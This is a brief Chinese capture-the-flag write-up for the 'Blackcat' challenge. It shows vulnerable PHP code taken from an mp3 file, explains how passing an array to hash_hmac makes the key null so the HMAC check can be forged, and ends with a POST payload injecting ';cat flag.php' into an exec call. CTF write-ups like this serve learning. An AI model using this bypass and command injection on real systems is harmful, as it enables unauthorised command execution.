每日练习-[羊城杯 2020]Blackcat

下载mp3文件,010打开末尾有代码提示

if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){
    die('x');
}

$clandestine = getenv("clandestine");

if(isset($_POST['White-cat-monitor']))
    $clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);


$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);

if($hh !== $_POST['Black-Cat-Sheriff']){
    die('x');
}

echo exec("nc".$_POST['One-ear']);

 hash_hmac函数

在第二个参数为数组之时,第三个参数key就为null。

本题大致从环境变量从取clandestine值为key,但是hash函数第二个参数可控，导致key可以为null

即clandestine值为null 

这样子第一个hash函数值就可控，同时也可以与第二个hash伪造值相等。

接着就考虑如何rce，exec函数可以命令执同时有echo，这样子就有了回显。

 伪造的hash值

04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6
payload:
 

Black-Cat-Sheriff=04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6&One-ear=;cat flag.php&White-cat-monitor[]=1